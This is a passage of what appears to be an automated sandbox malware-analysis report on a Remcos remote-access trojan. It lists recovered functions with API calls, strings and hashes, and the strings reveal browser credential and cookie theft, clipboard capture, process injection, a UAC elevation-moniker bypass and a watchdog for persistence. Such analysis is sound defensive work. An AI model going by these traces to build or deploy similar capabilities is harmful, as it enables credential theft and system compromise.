                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                          • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                          • API String ID: 3018269243-13974260
                                                          • Opcode ID: d611b42e7aa03f591de6f682371a24d31d64e0940eeb365583d2f3fdfb12aaca
                                                          • Instruction ID: 0875c1c5b4964050026a55d64e107580bc00b164e842ca732b5326ef53bac7f1
                                                          • Opcode Fuzzy Hash: d611b42e7aa03f591de6f682371a24d31d64e0940eeb365583d2f3fdfb12aaca
                                                          • Instruction Fuzzy Hash: A071B6716042056BFA14F770DC6596FB7A6AF917C4F40092DFB46531A0FF609909CEA2
                                                          Function 02F9BB6B Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 02F9BBEA
                                                          • FindClose.KERNEL32(00000000), ref: 02F9BC04
                                                          • FindNextFileA.KERNEL32(00000000,?), ref: 02F9BD27
                                                          • FindClose.KERNEL32(00000000), ref: 02F9BD4D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$CloseFile$FirstNext
                                                          • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                          • API String ID: 1164774033-3681987949
                                                          • Opcode ID: 33bb737552986ab18f9c71aba505b86f31be6ffbf01f50bee1b3c8b7b6a50161
                                                          • Instruction ID: 8c1c5df2b8c8493e5329b63a8ca8412f4c50b08c7ecb3225616b935da3cacdad
                                                          • Opcode Fuzzy Hash: 33bb737552986ab18f9c71aba505b86f31be6ffbf01f50bee1b3c8b7b6a50161
                                                          • Instruction Fuzzy Hash: 43514F31D0010E9AFF14FBB5DC54EEEB73AAF10784F50056AE70AA60A0EF605A49CE91
                                                          Function 02FA68FC Relevance: 18.1, APIs: 12, Instructions: 80clipboardmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenClipboard.USER32 ref: 02FA68FD
                                                          • EmptyClipboard.USER32 ref: 02FA690B
                                                          • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 02FA692B
                                                          • GlobalLock.KERNEL32(00000000), ref: 02FA6934
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 02FA696A
                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 02FA6973
                                                          • CloseClipboard.USER32 ref: 02FA6990
                                                          • OpenClipboard.USER32 ref: 02FA6997
                                                          • GetClipboardData.USER32(0000000D), ref: 02FA69A7
                                                          • GlobalLock.KERNEL32(00000000), ref: 02FA69B0
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 02FA69B9
                                                          • CloseClipboard.USER32 ref: 02FA69BF
                                                            • Part of subcall function 02F94AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02F94B36
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                          • String ID:
                                                          • API String ID: 3520204547-0
                                                          • Opcode ID: cfe36589132c61e1582ba16d7a3b1f13becb4e66721049b79b6b85986a96bde2
                                                          • Instruction ID: 83f6c44d14817ab3ef26f26da3226c6886e76cbdfe554a6dc36d689a47163790
                                                          • Opcode Fuzzy Hash: cfe36589132c61e1582ba16d7a3b1f13becb4e66721049b79b6b85986a96bde2
                                                          • Instruction Fuzzy Hash: 84213671A44205DFEF15BBB0DC5CAAFB6AEAF947C1F40082DF646861C0EF7448158A72
                                                          Function 02F9F4AF Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,030050E4,?,03005338), ref: 02F9F4C9
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,03005338), ref: 02F9F4F4
                                                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 02F9F510
                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 02F9F58F
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,?,?,03005338), ref: 02F9F59E
                                                            • Part of subcall function 02FAC26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 02FAC286
                                                            • Part of subcall function 02FAC26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 02FAC299
                                                          • CloseHandle.KERNEL32(00000000,?,03005338), ref: 02F9F6A9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                          • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                          • API String ID: 3756808967-1743721670
                                                          • Opcode ID: fe1e3162dbac7c8db968e7ebab700794c2630db35e5c02b1fb723459454c939f
                                                          • Instruction ID: cc128d83ca2acdd01d9ab77d4f3dad36d1f2411cf0e7c73c1c1cf58618d25021
                                                          • Opcode Fuzzy Hash: fe1e3162dbac7c8db968e7ebab700794c2630db35e5c02b1fb723459454c939f
                                                          • Instruction Fuzzy Hash: B4712D715083459AEF64FB20DC50AAFB7A6AF913C4F40092DE78A831A1EF31994DCF52
                                                          Function 02FA9662 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 206COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0$1$2$3$4$5$6$7
                                                          • API String ID: 0-3177665633
                                                          • Opcode ID: 0881422d185cea3ef85e6a0e0c348f1c88f67b51c1393837b8e09a30f5bd3818
                                                          • Instruction ID: 0c06cff18eeb3255a8035e6061cff1329b5c3428308dc6ec3e53231203c71dad
                                                          • Opcode Fuzzy Hash: 0881422d185cea3ef85e6a0e0c348f1c88f67b51c1393837b8e09a30f5bd3818
                                                          • Instruction Fuzzy Hash: C0717FB05083119FEB16EF20DC60FAA7BD5AF85790F80491DE692571D0DAB4AA4CCF92
                                                          Function 02F97538 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _wcslen.LIBCMT ref: 02F9755C
                                                          • CoGetObject.OLE32(?,00000024,02FF6528,00000000), ref: 02F975BD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Object_wcslen
                                                          • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                          • API String ID: 240030777-3166923314
                                                          • Opcode ID: 2e513bb568da54714ef0b910b306409f62053d997fdc2dec3dbeb7f0731a4e59
                                                          • Instruction ID: 0936c19c91d1681b8ce3f2e69365bc70aab85601ecb6b7b64f4d68572164ac45
                                                          • Opcode Fuzzy Hash: 2e513bb568da54714ef0b910b306409f62053d997fdc2dec3dbeb7f0731a4e59
                                                          • Instruction Fuzzy Hash: CC11A3B2910208ABFB50FAA4CC44EDEF7BD9F04B90F14005AF715E2250EA709A048E61
                                                          Function 02FAA7D9 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,030058E8), ref: 02FAA7EF
                                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 02FAA83E
                                                          • GetLastError.KERNEL32 ref: 02FAA84C
                                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 02FAA884
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                          • String ID:
                                                          • API String ID: 3587775597-0
                                                          • Opcode ID: cf7132ee575ca3143bc2f81bb32d38e2e9eaed16c66d7d8d73c34f06d45d3fea
                                                          • Instruction ID: 6dc15b075b881ae6f8c3cb724f5dd084ab8fc98c3f3a0c213bc2f1836dbb192f
                                                          • Opcode Fuzzy Hash: cf7132ee575ca3143bc2f81bb32d38e2e9eaed16c66d7d8d73c34f06d45d3fea
                                                          • Instruction Fuzzy Hash: C1817D71508305ABEB14EB60DC94EAFB7E9BF94784F50082DF68642150EF70EA09CF92
                                                          Function 02F9C388 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 02F9C3D6
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 02F9C4A9
                                                          • FindClose.KERNEL32(00000000), ref: 02F9C4B8
                                                          • FindClose.KERNEL32(00000000), ref: 02F9C4E3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$CloseFile$FirstNext
                                                          • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                          • API String ID: 1164774033-405221262
                                                          • Opcode ID: 58a1999abf917d713b9791d79485e90411f47873447f8d48abeb338cb6738dc9
                                                          • Instruction ID: 8c0d3d54528ac69db7f3768604ea1cbb37c4fb4c68f39a30e089d60049968b09
                                                          • Opcode Fuzzy Hash: 58a1999abf917d713b9791d79485e90411f47873447f8d48abeb338cb6738dc9
                                                          • Instruction Fuzzy Hash: 3D318031A0021E9AFF15F764DC54AFEB77EAF107D4F00016AE30AA60A0EF609986CE54
                                                          Function 02FAC322 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,030052D8,030052F0,00000001), ref: 02FAC37D
                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,030052D8,030052F0,00000001), ref: 02FAC3AD
                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,030052D8,030052F0,00000001), ref: 02FAC41F
                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,030052D8,030052F0,00000001), ref: 02FAC42C
                                                            • Part of subcall function 02FAC322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,030052D8,030052F0,00000001), ref: 02FAC402
                                                          • GetLastError.KERNEL32(?,?,?,?,?,030052D8,030052F0,00000001), ref: 02FAC44D
                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,030052D8,030052F0,00000001), ref: 02FAC463
                                                          • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,030052D8,030052F0,00000001), ref: 02FAC46A
                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,030052D8,030052F0,00000001), ref: 02FAC473
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                          • String ID:
                                                          • API String ID: 2341273852-0
                                                          • Opcode ID: 09c62e2744cca5fed3ccdff59be150eb4477bf796fa43591a99f627da747aade
                                                          • Instruction ID: d2e991329c5afffcc3cb8fa1af79568ebf0c5452a77f3b07d7981a94bff1fa62
                                                          • Opcode Fuzzy Hash: 09c62e2744cca5fed3ccdff59be150eb4477bf796fa43591a99f627da747aade
                                                          • Instruction Fuzzy Hash: 4E3193B2C4421C9AEF20D660DD58EEAB37DAF05380F1405ABEA55E2050EF759A94CE64
                                                          Function 02FA4005 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 02FA40D8
                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 02FA40E4
                                                            • Part of subcall function 02F94AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02F94B36
                                                          • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 02FA42A5
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FA42AC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressCloseCreateLibraryLoadProcsend
                                                          • String ID: SHDeleteKeyW$Shlwapi.dll
                                                          • API String ID: 2127411465-314212984
                                                          • Opcode ID: 25004fa071b81611c615c6643da8387f9f1e45e8ba989f5ce0760d48ac5e7e15
                                                          • Instruction ID: c15bb43c91381320ac52ef3c710485dc374ab49e24c5d51a64ca8786e8fcef7e
                                                          • Opcode Fuzzy Hash: 25004fa071b81611c615c6643da8387f9f1e45e8ba989f5ce0760d48ac5e7e15
                                                          • Instruction Fuzzy Hash: 7FB10872E0830166EE14FB74DC659AF76AA5F917C0F40052CFB17971E0EEA59A08CF92
                                                          Function 02FD9210 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 02FD9292
                                                          • _free.LIBCMT ref: 02FD92B6
                                                          • _free.LIBCMT ref: 02FD943D
                                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,02FEF244), ref: 02FD944F
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,03002764,000000FF,00000000,0000003F,00000000,?,?), ref: 02FD94C7
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,030027B8,000000FF,?,0000003F,00000000,?), ref: 02FD94F4
                                                          • _free.LIBCMT ref: 02FD9609
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                          • String ID:
                                                          • API String ID: 314583886-0
                                                          • Opcode ID: e08f4724dd74726d4a22a3ae4eec4a1b699825ae6b7e9e00e910426c71354050
                                                          • Instruction ID: bb64de2f47d77d826a2ec8f57d7bf6b53e7cb927dec76ac23f8d540a5030c3f4
                                                          • Opcode Fuzzy Hash: e08f4724dd74726d4a22a3ae4eec4a1b699825ae6b7e9e00e910426c71354050
                                                          • Instruction Fuzzy Hash: C4C11671E00205ABDB20AFF8DC40BAABBBFEF453D4F1C459AD69597280D7B19942CB50
                                                          Function 02F9BA4D Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 02F9BA89
                                                          • GetLastError.KERNEL32 ref: 02F9BA93
                                                          Strings
                                                          • [Chrome StoredLogins not found], xrefs: 02F9BAAD
                                                          • UserProfile, xrefs: 02F9BA59
                                                          • [Chrome StoredLogins found, cleared!], xrefs: 02F9BAB9
                                                          • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 02F9BA54
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DeleteErrorFileLast
                                                          • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                          • API String ID: 2018770650-1062637481
                                                          • Opcode ID: 893aadd99c775a67491325f79169b3ed38b82d1500d9c5276f8a7c36555da158
                                                          • Instruction ID: 5b91dc44b3a0e49c0c4584aa5b58c63b5f24fbf0a2ab0d866737198db4125fa6
                                                          • Opcode Fuzzy Hash: 893aadd99c775a67491325f79169b3ed38b82d1500d9c5276f8a7c36555da158
                                                          • Instruction Fuzzy Hash: 9301F931E8000A5B7F58F7B5EC269BE772AED116C8B800529DF17932A0FF518515CBD2
                                                          Function 02FA798D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 02FA799A
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 02FA79A1
                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 02FA79B3
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 02FA79D2
                                                          • GetLastError.KERNEL32 ref: 02FA79D8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                          • String ID: SeShutdownPrivilege
                                                          • API String ID: 3534403312-3733053543
                                                          • Opcode ID: bb63182216a0721bce20091f7d3c9f722d7d8027118551ee870341079e646ff8
                                                          • Instruction ID: f6364c81b389f895a2d95cf199917de7f39110d31d44fd91ea0835fff69ba468
                                                          • Opcode Fuzzy Hash: bb63182216a0721bce20091f7d3c9f722d7d8027118551ee870341079e646ff8
                                                          • Instruction Fuzzy Hash: BBF03AB184212CEBDF11EBA1EC0DAEFBFBCEF05691F000454BA05A5100D6B44A14CBB1
                                                          Function 02F9928E Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 02F99293
                                                            • Part of subcall function 02F948C8: connect.WS2_32(?,?,?), ref: 02F948E0
                                                            • Part of subcall function 02F94AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02F94B36
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 02F9932F
                                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 02F9938D
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 02F993E5
                                                          • FindClose.KERNEL32(00000000), ref: 02F993FC
                                                            • Part of subcall function 02F94E26: WaitForSingleObject.KERNEL32(?,000000FF,00000000,03004EF8,?,00000000,03004EF8,02F94CA8,00000000,?,?,?,03004EF8,?), ref: 02F94E38
                                                            • Part of subcall function 02F94E26: SetEvent.KERNEL32(?,?,00000000,03004EF8,02F94CA8,00000000,?,?,?,03004EF8,?), ref: 02F94E43
                                                            • Part of subcall function 02F94E26: CloseHandle.KERNEL32(?,?,00000000,03004EF8,02F94CA8,00000000,?,?,?,03004EF8,?), ref: 02F94E4C
                                                          • FindClose.KERNEL32(00000000), ref: 02F995F4
                                                            • Part of subcall function 02F94AA1: WaitForSingleObject.KERNEL32(?,00000000,02F9547D,?,?,00000004,?,?,00000004,?,03004EF8,?), ref: 02F94B47
                                                            • Part of subcall function 02F94AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,03004EF8,?,?,?,?,?,?,02F9547D), ref: 02F94B75
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                          • String ID:
                                                          • API String ID: 1824512719-0
                                                          • Opcode ID: 1e1ef81558cd8708aabecb99aca17125bed8b212e4d381f0e5cd33047779ac57
                                                          • Instruction ID: 93640d4b48af9f13d9160a5b03ba1dcbcf04c8164f95e7ce1a7e8dfa1d35bc85
                                                          • Opcode Fuzzy Hash: 1e1ef81558cd8708aabecb99aca17125bed8b212e4d381f0e5cd33047779ac57
                                                          • Instruction Fuzzy Hash: 64B16032900109ABEF15FBA0DD51EEDB77AAF14394F504169E70AA71A0EF709B49CF90
                                                          Function 02FAAADB Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,02FAA731,00000000), ref: 02FAAAE4
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,02FAA731,00000000), ref: 02FAAAF9
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,02FAA731,00000000), ref: 02FAAB06
                                                          • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,02FAA731,00000000), ref: 02FAAB11
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,02FAA731,00000000), ref: 02FAAB23
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,02FAA731,00000000), ref: 02FAAB26
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ManagerStart
                                                          • String ID:
                                                          • API String ID: 276877138-0
                                                          • Opcode ID: 648c9134be0e72ad3e8360b28485612512f1e7fd2f9170ed9ac980a9a5f50478
                                                          • Instruction ID: 1a06062e660b17b298fecf89a2894b405ad89e753af7e81a0940155ffd57131f
                                                          • Opcode Fuzzy Hash: 648c9134be0e72ad3e8360b28485612512f1e7fd2f9170ed9ac980a9a5f50478
                                                          • Instruction Fuzzy Hash: D9F0E97198112DAFEA129A31AC88EFF3B6CDF85AE5B00081AFA05861009BA48C59D971
                                                          Function 02FA67EF Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 02FA798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 02FA799A
                                                            • Part of subcall function 02FA798D: OpenProcessToken.ADVAPI32(00000000), ref: 02FA79A1
                                                            • Part of subcall function 02FA798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 02FA79B3
                                                            • Part of subcall function 02FA798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 02FA79D2
                                                            • Part of subcall function 02FA798D: GetLastError.KERNEL32 ref: 02FA79D8
                                                          • ExitWindowsEx.USER32(00000000,00000001), ref: 02FA6891
                                                          • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 02FA68A6
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FA68AD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                          • String ID: PowrProf.dll$SetSuspendState
                                                          • API String ID: 1589313981-1420736420
                                                          • Opcode ID: d0f9685d29e91fbb8a3256bda3725f732a892519fe73d7708ed4136e0c4d9204
                                                          • Instruction ID: cab1e3997effe49c1a13df365d16457a7b15242f59ea3331ab4fadadaaab29aa
                                                          • Opcode Fuzzy Hash: d0f9685d29e91fbb8a3256bda3725f732a892519fe73d7708ed4136e0c4d9204
                                                          • Instruction Fuzzy Hash: E7213EB1B0430A56EE54FFB09C69A7F735E9F407C8F440868A3069B1C4EFA5A809CF21
                                                          Function 02FE24BC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,02FE27DB,?,00000000), ref: 02FE2555
                                                          • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,02FE27DB,?,00000000), ref: 02FE257E
                                                          • GetACP.KERNEL32(?,?,02FE27DB,?,00000000), ref: 02FE2593
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID: ACP$OCP
                                                          • API String ID: 2299586839-711371036
                                                          • Opcode ID: a11ccca03349ee3a168e7246857483cbef904eea8d4512f8c012dcdfa2ea389b
